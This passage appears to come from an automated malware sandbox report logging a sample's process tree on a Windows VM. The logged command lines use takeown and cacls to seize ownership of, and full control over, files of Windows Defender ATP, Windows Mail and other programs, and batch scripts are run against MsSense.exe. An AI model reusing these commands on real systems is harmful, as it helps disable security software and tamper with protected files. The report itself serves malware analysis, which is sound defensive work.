| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Defender Advanced Threat Protection\en-US\MsSense.exe.mui" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:36, Reason: Child Process |
| Unmonitor | End Time: 00:03:47, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1340 |
| Parent PID | 0xeb4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F80
0x
FA8
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #155: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #155 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:37, Reason: Child Process |
| Unmonitor | End Time: 00:03:43, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xedc |
| Parent PID | 0x138c (c:\windows\syswow64\cacls.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
11BC
0x
E2C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #156: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #156 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Security\BrowserCore\manifest.json" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:38, Reason: Child Process |
| Unmonitor | End Time: 00:03:45, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe1c |
| Parent PID | 0xed0 (c:\windows\syswow64\takeown.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E14
0x
B98
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #157: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #157 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Security\BrowserCore\en-US\BrowserCore.exe.mui" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:39, Reason: Child Process |
| Unmonitor | End Time: 00:03:46, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe04 |
| Parent PID | 0x13fc (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
36C
0x
F74
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #158: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #158 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:51, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1330 |
| Parent PID | 0x13c4 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
113C
0x
137C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #159: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #159 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\UNP\convertible-suicide-construction.exe" /E /G FD1HVy:F /C |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:43, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:10 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1380 |
| Parent PID | 0x1334 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1378
0x
1348
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cacls.exe | 0x00AC0000 | 0x00AC9FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #160: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #160 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\rempl\does.exe" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:45, Reason: Child Process |
| Unmonitor | End Time: 00:03:50, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x106c |
| Parent PID | 0xe60 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1358
0x
F58
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #161: dllhost.exe
0
0
| Information | Value |
|---|---|
| ID | #161 |
| File Name | c:\windows\system32\dllhost.exe |
| Command Line | C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:46, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:39 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x1344 |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
368
0x
11F4
0x
DB8
0x
112C
0x
10B0
0x
FF0
0x
FE0
0x
126C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| dllhost.exe | 0x7FF6FB010000 | 0x7FF6FB018FFF | Process Termination | - | 64-bit | - |
|
|
|
Process #162: cmd.exe
141
0
| Information | Value |
|---|---|
| ID | #162 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Mail\WinMail.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:46, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:39 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x910 |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F04
0x
15C
|
Host Behavior
File (83)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
39 | |
| Open | STD_INPUT_HANDLE | - |
|
7 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
4 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 63 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 48 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 96, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\WINDOWS\system32\cacls.exe | os_pid = 0x13cc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\WINDOWS\system32\takeown.exe | creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (29)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
7 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = FD1HVy |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
2 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #164: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #164 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Java\jre1.8.0_144\bin\server\classes.jsa" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:47, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:06 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x12ec |
| Parent PID | 0x1204 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12F4
0x
11D4
0x
1158
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #165: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #165 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:47, Reason: Child Process |
| Unmonitor | End Time: 00:03:53, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x11f8 |
| Parent PID | 0xd64 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
12FC
0x
DBC
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| takeown.exe | 0x00870000 | 0x00880FFF | Process Termination | - | 32-bit | - |
|
|
|
Process #166: cmd.exe
58
0
| Information | Value |
|---|---|
| ID | #166 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c mxkeFu6a.exe -accepteula "vt mapping.exe" -nobanner |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:49, Reason: Child Process |
| Unmonitor | End Time: 00:04:22, Reason: Self Terminated |
| Monitor Duration | 00:00:33 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x10fc |
| Parent PID | 0x1088 (c:\windows\syswow64\cmd.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
1264
0x
116C
|
Memory Dumps
| Name | Start VA | End VA | Dump Reason | PE Rebuilds | Bitness | Entry Points | AV | YARA | Actions |
|---|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00CD0000 | 0x00D28FFF | Process Termination | - | 32-bit | - |
|
|
|
Host Behavior
File (13)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | mxkeFu6a.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
6 | |
| Open | STD_INPUT_HANDLE | - |
|
4 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 197, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\mxkeFu6a.exe | os_pid = 0x10c4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0xcd0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75e90000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75ea4f70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x75ea4330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x75ea5930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74fe09d0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\FD1HVy\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #167: cmd.exe
0
0
| Information | Value |
|---|---|
| ID | #167 |
| File Name | c:\windows\system32\cmd.exe |
| Command Line | C:\WINDOWS\SYSTEM32\cmd.exe /c "C:\Users\FD1HVy\AppData\Roaming\V1nQ8f0P.bat" |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:35 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc38 |
| Parent PID | 0x3c0 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DF4
|
Process #168: wmiprvse.exe
0
0
| Information | Value |
|---|---|
| ID | #168 |
| File Name | c:\windows\system32\wbem\wmiprvse.exe |
| Command Line | C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding |
| Initial Working Directory | C:\WINDOWS\system32\ |
| Monitor | Start Time: 00:03:50, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:35 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x134c |
| Parent PID | 0x2b4 (c:\windows\system32\svchost.exe) |
| Bitness | 64-bit |
| Is Created or Modified Executable |
|
| Integrity Level | System (Elevated) |
| Username | NT AUTHORITY\Network Service |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B60
0x
174
0x
1370
0x
A60
0x
11E4
0x
11D0
0x
1254
0x
498
0x
13D0
|
Process #169: cmd.exe
132
0
| Information | Value |
|---|---|
| ID | #169 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\WINDOWS\system32\cmd.exe /c ""C:\Users\FD1HVy\Desktop\c7356Qly.bat" "C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"" |
| Initial Working Directory | C:\Users\FD1HVy\Desktop\ |
| Monitor | Start Time: 00:03:51, Reason: Child Process |
| Unmonitor | End Time: 00:04:25, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:34 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfac |
| Parent PID | 0xfc8 (c:\users\fd1hvy\desktop\m.exe) |
| Bitness | 32-bit |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | NQDPDE\FD1HVy |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E40
0x
1270
|
Host Behavior
File (79)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\FD1HVy\Desktop\c7356Qly.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\FD1HVy\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\FD1HVy\Desktop\c7356Qly.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
10 | |
| Get Info | - | type = file_type |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
37 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 24 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
